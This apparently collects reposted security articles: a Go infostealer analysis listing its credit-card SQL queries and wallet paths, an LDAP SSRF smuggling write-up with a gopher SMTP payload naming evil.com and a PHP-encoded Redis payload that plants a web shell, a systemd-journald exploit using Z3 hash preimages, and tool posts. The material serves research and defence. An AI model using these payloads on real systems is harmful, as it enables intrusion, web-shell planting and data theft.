in the application: It is statically linked with the following modules: GRequests (https://github.com/levigross/grequests) go-sqlite3 (https://github.com/mattn/go-sqlite3) try (https://github.com/manucorporat/try) Analyzing this function can help us predict the functionality; i.e. looking the above libraries, we can see that they will be communicating over the network, reading SQLite3 databases, and throwing exceptions. Other initializers suggests using regular expressions, zip format, and reading environmental variables. This function is also responsible for initializing and mapping strings. We can see that some of them are first base64 decoded: In string initializes, we see references to cryptocurrency wallets. Ethereum: Monero: The main function of Golang binary is annotated “main_main”. Here, we can see that the application is creating a new directory (using a function os.Mkdir). This is the directory where the found files will be copied. After that, there are several Goroutines that have started using runtime.newproc. (Goroutines can be used similarly as threads, but they are managed differently. More details can be found here). Those routines are responsible for searching for the files. Meanwhile, the Sqlite module is used to parse the databases in order to steal data. Then, the malware zips it all into one package, and finally, the package is uploaded to the C&C. What was stolen? To see what exactly which data the attacker is interested in, we can see look more closely at the functions that are performing SQL queries, and see the related strings. Strings in Golang are stored in bulk, in concatenated form: Later, a single chunk from such bulk is retrieved on demand. Therefore, seeing from which place in the code each string was referenced is not-so-easy. Below is a fragment in the code where an “sqlite3” database is opened (a string of the length 7 was retrieved): Another example: This query was retrieved from the full chunk of strings, by given offset and length: Let’s take a look at which data those queries were trying to fetch. Fetching the strings referenced by the calls, we can retrieve and list all of them: select name_on_card, expiration_month, expiration_year, card_number_encrypted, billing_address_id FROM credit_cards select * FROM autofill_profiles select email FROM autofill_profile_emails select number FROM autofill_profile_phone select first_name, middle_name, last_name, full_name FROM autofill_profile_names We can see that the browser’s cookie database is queried in search data related to online transactions: credit card numbers, expiration dates, as well as personal data such as names and email addresses. The paths to all the files being searched are stored as base64 strings. Many of them are related to cryptocurrency wallets, but we can also find references to the Telegram messenger. Software\\Classes\\tdesktop.tg\\shell\\open\\command \\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\ \\AppData\\Roaming\\Electrum\\wallets\\default_wallet \\AppData\\Local\\Torch\\User Data\\ \\AppData\\Local\\Uran\\User Data\\ \\AppData\\Roaming\\Opera Software\\ \\AppData\\Local\\Comodo\\User Data\\ \\AppData\\Local\\Chromium\\User Data\\ \\AppData\\Local\\Chromodo\\User Data\\ \\AppData\\Local\\Kometa\\User Data\\ \\AppData\\Local\\K-Melon\\User Data\\ \\AppData\\Local\\Orbitum\\User Data\\ \\AppData\\Local\\Maxthon3\\User Data\\ \\AppData\\Local\\Nichrome\\User Data\\ \\AppData\\Local\\Vivaldi\\User Data\\ \\AppData\\Roaming\\BBQCoin\\wallet.dat \\AppData\\Roaming\\Bitcoin\\wallet.dat \\AppData\\Roaming\\Ethereum\\keystore \\AppData\\Roaming\\Exodus\\seed.seco \\AppData\\Roaming\\Franko\\wallet.dat \\AppData\\Roaming\\IOCoin\\wallet.dat \\AppData\\Roaming\\Ixcoin\\wallet.dat \\AppData\\Roaming\\Mincoin\\wallet.dat \\AppData\\Roaming\\YACoin\\wallet.dat \\AppData\\Roaming\\Zcash\\wallet.dat \\AppData\\Roaming\\devcoin\\wallet.dat Big but unsophisticated malware Some of the concepts used in this malware remind us of other stealers, such as Evrial, PredatorTheThief, and Vidar. It has similar targets and also sends the stolen data as a ZIP file to the C&C. However, there is no proof that the author of this stealer is somehow linked with those cases. When we take a look at the implementation as well as the functionality of this malware, it’s rather simple. Its big size comes from many statically-compiled modules. Possibly, this malware is in the early stages of development— its author may have just started learning Go and is experimenting. We will be keeping eye on its development. At first, analyzing a Golang-compiled application might feel overwhelming, because of its huge codebase and unfamiliar structure. But with the help of proper tools, security researchers can easily navigate this labyrinth, as all the functions are labeled. Since Golang is a relatively new programming language, we can expect that the tools to analyze it will mature with time. Is malware written in Go an emerging trend in threat development? It’s a little too soon to tell. But we do know that awareness of malware written in new languages is important for our community. Sursa: https://blog.malwarebytes.com/threat-analysis/2019/01/analyzing-new-stealer-written-golang/
-
- 2
-
-
SSRF Protocol Smuggling in Plaintext Credential Handlers : LDAP SSRF protocol smuggling involves an attacker injecting one TCP protocol into a dissimilar TCP protocol. A classic example is using gopher (i.e. the first protocol) to smuggle SMTP (i.e. the second protocol): 1 gopher://127.0.0.1:25/%0D%0AHELO%20localhost%0D%0AMAIL%20FROM%3Abadguy@evil.com%0D%0ARCPT%20TO%3Avictim@site.com%0D%0ADATA%0D%0A .... The keypoint above is the use of the CRLF character (i.e. %0D%0A) which breaks up the commands of the second protocol. This attack is only possible with the ability to inject CRLF characters into a protocol. Almost all LDAP client libraries support plaintext authentication or a non-ssl simple bind. For example, the following is an LDAP authentication example using Python 2.7 and the python-ldap library: 1 2 3 import ldap conn = ldap.initialize("ldap://[SERVER]:[PORT]") conn.simple_bind_s("[USERNAME]", "[PASSWORD]") In many LDAP client libraries it is possible to insert a CRLF inside the username or password field. Because LDAP is a rather plain TCP protocol this makes it immediately of note. 1 2 3 import ldap conn = ldap.initialize("ldap://0:9000") conn.simple_bind_s("1\n2\n\3\n", "4\n5\n6---") You can see the CRLF characters are sent in the request: 1 2 3 4 5 6 7 8 9 # nc -lvp 9000 listening on [::]:9000 ... connect to [::ffff:127.0.0.1]:9000 from localhost:39250 ([::ffff:127.0.0.1]:39250) 0`1 2 3 4 5 6--- Real World Example Imagine the case where the user can control the server and the port. This is very common in LDAP configuration settings. For example, there are many web applications that support LDAP configuration as a feature. Some common examples are embedded devices (e.g. webcam, routers), Multi-Function Printers, multi-tenancy environments, and enterprise appliances and applications. Putting It All Together If a user can control the server/port and CRLF can be injected into the username or password, this becomes an interesting SSRF protocol smuggle. For example, here is a Redis Remote Code Execution payload smuggled completely inside the password field of the LDAP authentication in a PHP application. In this case the web root is ‘/app’ and the Redis server would need to be able to write the web root: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 <?php $adServer = "ldap://127.0.0.1:6379"; $ldap = ldap_connect($adServer); # RCE smuggled in the password field $password = "_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2434%0D%0A %0A%0A%3C%3Fphp%20system%28%24_GET%5B%27cmd%27%5D%29%3B%20%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A %243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%244%0D%0A/app%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A %2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A"; $ldaprdn = 'domain' . "\\" . "1\n2\n3\n"; ldap_set_option($ldap, LDAP_OPT_PROTOCOL_VERSION, 3); ldap_set_option($ldap, LDAP_OPT_REFERRALS, 0); $bind = @ldap_bind($ldap, $ldaprdn, urldecode($password)); ?> Client Libraries In my opinion, the client library is functioning correctly by allowing these characters. Rather, it’s the application’s job to filter username and password input before passing it to an LDAP client library. I tested out four LDAP libraries that are packaged with common languages all of which allow CRLF in the username or password field: Library Tested In python-ldap Python 2.7 com.sun.jndi.ldap JDK 11 php-ldap PHP 7 net-ldap Ruby 2.5.2 ——- ——– Summary Points • If you are an attacker and find an LDAP configuration page, check if the username or password field allows CRLF characters. Typically the initial test will involve sending the request to a listener that you control to verify these characters are not filtered. • If you are defender, make sure your application is filtering CRLF characters (i.e. %0D%0A) Blackhat USA 2019 @AndresRiancho and I (@0xrst) have an outstanding training coming up at Blackhat USA 2019. There are two dates available and you should join us!!! It is going to be fun. Sursa: https://www.silentrobots.com/blog/2019/02/06/ssrf-protocol-smuggling-in-plaintext-credential-handlers-ldap/
-
- 1
-
-
Justin Steven Publicat pe 6 feb. 2019 https://twitch.tv/justinsteven In this strewam we rework our exploit for the 64-bit split write4 binary from ROP Emporium (https://ropemporium.com/) - and in doing so we get completely nerd-sniped by a strange ret2system crash.
-
idenLib - Library Function Identification When analyzing malware or 3rd party software, it's challenging to identify statically linked libraries and to understand what a function from the library is doing. idenLib.exe is a tool for generating library signatures from .lib files. idenLib.dp32 is a x32dbg plugin to identify library functions. idenLib.py is an IDA Pro plugin to identify library functions. Any feedback is greatly appreciated: @_qaz_qaz How does idenLib.exe generate signatures? Parse input file(.lib file) to get a list of function addresses and function names. Get the last opcode from each instruction and generate MD5 hash from it (you can change the hashing algorithm). Save the signature under the SymEx directory, if the input filename is zlib.lib, the output will be zlib.lib.sig, if zlib.lib.sig already exists under the SymEx directory from a previous execution or from the previous version of the library, the next execution will append different signatures. If you execute idenLib.exe several times with different version of the .lib file, the .sig file will include all unique function signatures. Signature file format: hash function_name Generating library signatures x32dbg, IDAPro plugin usage: Copy SymEx directory under x32dbg/IDA Pro's main directory Apply signatures: x32dbg: IDAPro: Only x86 is supported (adding x64 should be trivial). Useful links: Detailed information about C Run-Time Libraries (CRT); Credits Disassembly powered by Zydis Icon by freepik Sursa: https://github.com/secrary/idenLib
-
- 1
-
-
Exploiting systemd-journald Part 2 February 6, 2019 By Nick Gregory Introduction This is the second part in a multipart series on exploiting two vulnerabilities in systemd-journald, which were published by Qualys on January 9th. In the first post, we covered how to communicate with journald, and built a simple proof-of-concept to exploit the vulnerability, using predefined constants for fixed addresses (with ASLR disabled). In this post, we explore how to compute the hash preimages necessary to write a controlled value into libc’s __free_hook as described in part one. This is an important step in bypassing ASLR, as the address of the target location to which we redirect execution (which is system in our case) will be changing between each instance of systemd-journald. Consequently, successful exploitation in the presence of ASLR requires computing a hash preimage dynamically to correspond with the respective address space of that instance of systemd-journald. How to disclose the location of system, and writing an exploit to completely bypass ASLR, are beyond the scope of this post. The Challenge As noted in the first blog post, we don’t directly control the data written to the stack after it has been lowered into libc’s memory – the actual values written are the result of hashing our journal entries with jenkins_hashlittle2. Since this is a function pointer we’re overwriting, we must have full 64 bit control of the hash output which can seem like a very daunting task at first, and would indeed be impractical if a cryptographically secure hash was used. However jenkins_hashlittle2 is not cryptographically secure, and we can use this property to generate preimages for any 64 bit output in just a few seconds. The Solution We can use a tool like Z3 to build a mathematical definition of the hash function and automatically generate an input which satisfies certain constraints (like the output being the address of system, and the input being constrained to valid entry format). Z3 Z3 is a theorem prover which gives us the ability to (among other things) easily model and solve logical constraints. Let’s take a look at how to use it by going through an example in the Z3 repo. In this example, we want to find if there exists an assignment for variables x and y so that the following conditions hold: x + y > 5 x > 1 y > 1 It is clear that more than one solutions exist to satisfy the above set of constraints. Z3 will inform us if the set constraints has a solution (is satisfiable), as well as provide us with one assignment to our variables that demonstrates satisfiability. Let’s see how Z3 can do so: from z3 import * x = Real('x') y = Real('y') s = Solver() s.add(x + y > 5, x > 1, y > 1) print(s.check()) print(s.model()) This simple example shows how to create variables (e.g. Real('x')), add the constraints that x + y > 5, x > 1, and y > 1 (s.add(x + y > 5, x > 1, y > 1)), check if the given state is satisfiable (i.e. there are values for x and y that satisfy all constraints), and get a set of values for x and y that satisfy the constraints. As expected, running this example yields: sat [y = 4, x = 2] meaning that the stated formula is satisfiable, and that y=4, x=2 is a solution that satisfies the equation. BitVectors Not only can Z3 represent arbitrary real numbers, but it can also represent fixed-width integers called BitVectors. We can use these to model some more interesting elements of low-level computing like integer wraparound: from z3 import * x = BitVec('x', 32) # Create a 32-bit wide variable, x y = BitVec('y', 32) s = Solver() s.add(x > 0, y > 0, x+y < 0) # Constrain x and y to be positive, but their sum to be negative print(s.check()) print(s.model()) A few small notes here: Adding two BitVecs of a certain size yields another BitVec of the same size Comparisons made by using < and > in Python result in signed comparisons being added to the solver constraints. Unsigned comparisons can be made using Z3-provided functions. And as we’d expect, sat [b = 2147451006, a = 2147451006] BitVecs give us a very nice way to represent the primitive C types, such as the ones we will need to model the hash function in order to create our preimages. Transformations Being able to solve simple equations is great, but in general we will want to reason on more complex operations involving variables. Z3’s Python bindings allow us to do this in an intuitive way. For instance (drawing from this Wikipedia example), if we wanted to find a fixed point in the equation f(x) = x2-3x+4, we can simply write: def f(x): return x**2 - 3*x + 4 x = Real('x') s = Solver() s.add(f(x) == x) s.check() s.model() This yields an expected result: sat x = 2 Lastly, it’s worth noting that Z3’s Python bindings provide pretty-printing for expressions. So if we print out f(x) in the above example, we get a nicely formatted representation of what f(x) is symbolically: x**2 - 3*x + 4 This just scratches the surface of what you can do with Z3, but it’s enough for us to begin using Z3 to model jenkins_hashlittle2, and create preimages for it. Modeling The Hash Function Input As noted above, all BitVectors in Z3 have a fixed size, and this is where we run into our first issue. Our hash function, jenkins_hashlittle2, takes a variable length array of input which can’t be modeled with a fixed length BitVec. So we first need to decide how long our input is going to be. Looking through the hash function’s source, we see that it chunks its input into 3 uint32_ts at a time, and operates on those. If this is a hash function that uniformly distributes its output, those 12 bytes of input should be enough to cover the 8 byte output space (i.e. all possible 8 byte outputs should be generated by one or more 12 byte input), so we should be able to use 12 bytes as our input length. This also has the benefit of never calling the hash’s internal state mixing function, which greatly reduces the complexity of the equations. length = 12 target = 0x7ffff7a33440 # The address of system() on our ASLR-disabled system s = Solver() key = BitVec('key', 8*length) Input Constraints Our input (key) has to satisfy several constraints. Namely, it must be a valid journald native entry. As we saw in part one, this means it should resemble “ENTRY_NAME=ENTRY_VALUE”. However there are some constraints on ENTRY_NAME that we must be taken into account (as checked by the journal_field_valid function): the name must be less than 64 characters, must start with [A-Z], and must only contain [A-Z0-9_]. The ENTRY_VALUE has no constraints besides not containing a newline character, however. To minimize the total number of constraints Z3 has to solve for, we chose to hard-code the entry format in our model as one uppercase character for the entry name, an equals sign, and then 10 ASCII-printable characters above the control character range for the entry value. To specify this in Z3, we will use the Extract function, which allows us to select slices of a BitVector, such that we can apply constraints to that slice. Extract takes three arguments: bit length, starting offset, and BitVector. char = Extract(7, 0, key) s.add(char >= ord('A'), char <= ord('Z')) # First character must be uppercase char = Extract(15, 8, key) s.add(char == ord('=')) # Second character must be ‘=’ for char_offset in range(16, 8*length, 8): char = Extract(char_offset + 7, char_offset, key) s.add(char >= 0x20, char <= 0x7e) # Subsequent characters must just be in the printable range Note: Z3’s Extract function is very un-Pythonic. It takes the high bit first (inclusive), then the low bit (inclusive), then the source BitVec to extract from. So Extract(7, 0, key) extracts the first byte from key. The Function Itself Now that we have our input created and constrained, we can model the function itself. First, we create our Z3 instance of the internal state variables uint32_t a, b, c using the BitVecVal class (which is just a way of creating a BitVec of the specified length with a predetermined value). The predetermined value is the same as in the hashing function, which is the constant 0xdeadbeef plus the length: initial_vaue = 0xdeadbeef + length a = BitVecVal(initial_value, 32) b = BitVecVal(initial_value, 32) c = BitVecVal(initial_value, 32) Note: The *pc component of the initialization will always be 0, as it’s initialized to 0 in the hash64() function, which is what’s actually called on our input. We can ignore the alignment checks the hash function does (as we aren’t actually dereferencing anything in Z3). We can also skip past the while (length > 12) loop, and start in the case 12 as our length is hard-coded to be 12. Thus the first bit of code we need to implement is from inside the switch block on the length, at case 12, which adds the three parts of the key to a, b, and 😄 a += Extract(31, 0, key) b += Extract(63, 32, key) c += Extract(95, 64, key) Since key is just an vector of bits from the perspective of Z3, in the above code we just Extract the first, second, and third uint32_t – there’s no typecasting to do. Following the C source, we next need to implement the final macro, which does the final state mixing to produce the hash output. Looking at the source, it uses another macro (rot), but this is just a simple rotate left operation. Z3 has rotate left as a primitive function, so we can make our lives easy by adding an import to our Python: from z3 import RotateLeft as rot And then we can simply paste in the macro definition verbatim (well, minus the line-continuation characters): c ^= b; c -= rot(b, 14) a ^= c; a -= rot(c, 11) b ^= a; b -= rot(a, 25) c ^= b; c -= rot(b, 16) a ^= c; a -= rot(c, 4) b ^= a; b -= rot(a, 14) c ^= b; c -= rot(b, 24) At this point, the variables a, b, and c contain equations which represent their state when the hash function is about to return. From the source, hash64() combines the b and c out arguments to produce the final 64-bit hash. So we can simply add constraints to our model to denote that b and c are equal to their respective halves of the 64-bit output we want: s.add(b == (target & 0xffffffff)) s.add(c == (target >> 32)) All that’s left at this point is to check the state for satisfiability: s.check() Get our actual preimage value from the model: preimage = s.model()[key].as_long() And transform it into a string: input_str = preimage.to_bytes(12, byteorder='little').decode('ascii') With that, our exploit from part 1 is now fully explained, and can be used on any system where the addresses of libc and the stack are constant (i.e. systems which have ASLR disabled). Conclusion Z3 is a very powerful toolkit that can be used to solve a number of problems in exploit development. This blog post has only scratched the surface of its capabilities, but as we’ve seen, even basic Z3 operations can be used to trivially solve complex problems. Read Part One of this series Sursa: https://capsule8.com/blog/exploiting-systemd-journald-part-2/
-
- 1
-
-
Wednesday, February 6, 2019 Remote LIVE Memory Analysis with The Memory Process File System v2.0 This blog entry aims to give an introduction to The Memory Process File System and show how easy it is to do high-performant memory analysis even from live remote systems over the network. This and much more is presented in my BlueHatIL 2019 talk on February 6th. Connect to a remote system over the network over a kerberos secured connection. Acquire only the live memory you require to do your analysis/forensics - even over medium latency/bandwidth connections. An easy to understand file system user interface combined with continuous background refreshes, made possible by the multi-threaded analysis core, provides an interesting new different way of performing incident response by live memory analysis. Analyzing and Dumping remote live memory with the Memory Process File System. The image above shows the user staring MemProcFS.exe with a connection to the remote computer book-test.ad.frizk.net and with the DumpIt live memory acquisition method. it is then possible to analyze live memory simply by clicking around in the file system. Dumping the physical memory is done by copying the pmem file in the root folder. Background The Memory Process File System was released for PCILeech in March 2018, supporting 64-bit Windows, and was used to find the Total Meltdown / CVE-2018-1038 page table permission bit vulnerability in the Windows 7 kernel. People have also used it to cheat in games - primarily cs:go using it via the PCILeech API. The Memory Process File System was released as a stand-alone project focusing exclusively on memory analysis in November 2018. The initial release included both APIs and Plugins for C/C++ and a Python. Support was added soon thereafter for 32-bit memory models and Windows support was expanded as far back as Windows XP. What is new? Version 2.0 of The Memory Process File System marks a major release that was released in conjunction with the BlueHatIL 2019 talk Practical Uses for Hardware-assisted Memory Visualization. New functionality includes: A new separate physical memory acquisition library - the LeechCore. Live memory acquisition with DumpIt or WinPMEM. Remote memory capture via a remotely running LeechService. Support from Microsoft Crash Dumps and Hyper-V save files. Full multi-threaded support in the memory analysis library. Major performance optimizations. The combination live memory capture via Comae DumpIt, or the less stable WinPMEM, and secure remote access may be interesting both for convenience and incident-response. It even works remarkably well over medium latency- and bandwidth connections. The LeechCore library The LeechCore library, focusing exclusively on memory acquisition, is released as a standalone open source project as a part of The Memory Process File System v2 release. The LeechCore library abstracts memory acquisition from analysis and makes things more modular and easier to re-use. The library supports multiple memory acquisition methods - such as: Hardware: USB3380, PCILeech FPGA and iLO Live memory: Comae DumpIt and WinPMEM Dump files: raw memory dump files, full crash dump files and Hyper-V save files. The LeechCore library also allows for transparently connecting to a remote LeechService running on a remote system over a compressed mutually authenticated RPC connection secured by Kerberos. Once connected any of the supported memory acquisition methods may be used. The LeechService The LeechService may be installed as a service with the command LeechSvc.exe install. Make sure all necessary dependencies are in the folder of leechsvc.exe - i.e. leechcore.dll and winpmem_x64.sys (if using winpmem). The LeechService will write an entry, containing the kerberos SPN to the application event log once started provided that the computer is a part of an Active Directory domain. The LeechService is installed and started with the Kerberos SPN: book-test$@AD.FRIZK.NET Now connect to the remote LeechService with The Memory Process File System - provided that the port 28473 is open in the firewall. The connecting user must be an administrator on the system being analyzed. An event will also be logged for each successful connection. In the example below winpmem is used. Note that winpmem may unstable on recent Windows 10 systems. Securely connected to the remote system - acquiring and analyzing live memory. It's also possible to start the LeechService in interactive mode. If starting it in interactive mode it can be started with DumpIt to provide more stable memory acquisition. It may also be started in insecure no-security mode - which may be useful if the computer is not joined to an Active Directory domain. Using DumpIt to start the LeechSvc in interactive insecure mode. If started in insecure mode everyone with access to port 28473 will be able to connect and capture live memory. No logs will be written. The insecure mode is not available in service mode. It is only recommended in secure environments in which the target computer is not domain joined. Please also note that it is also possible to start the LeechService in interactive secure mode. To connect to the example system from a remote system specify: MemProcFS.exe -device dumpit -remote rpc://insecure:<address_of_remote_system> How do I try it out? Yes! - both the Memory Process File System and the LeechService is 100% open source. Download The Memory Process File System from Github - pre-built binaries are found in the files folder. Also, follow the instructions to install the open source Dokany file system. Download the LeechService from Github - pre-built binaries with no external dependencies are found in the files folder. Please also note that you may have to download Comae DumpIt or WinPMEM (latest release, install and copy .sys driver file) to acquire live memory. The Future Please do keep in mind that this is a hobby project. Since I'm not working professionally with this future updates may take time and are also not guaranteed. The Memory Process File System and the LeechCore is already somewhat mature with its focus on fast, efficient, multi-threaded live memory acquisition and analysis even though current functionality is somewhat limited. The plan for the near future is to add additional core functionality - such as page hashing and PFN database support. Page hashing will allow for more efficient remote memory acquisition and better forensics capabilities. PFN database support will strengthen virtual memory support in general. Also, additional and more efficient analysis methods - primarily in the form of new plugins will also be added in the medium future. Support for additional operating systems, such as Linux and macOS is a long-term goal. It shall however be noted that the LeechCore library is already supported on Linux. Posted by Ulf Frisk at 2:35 PM Sursa: http://blog.frizk.net/2019/02/remote-live-memory-analysis-with-memory.html
-
- 1
-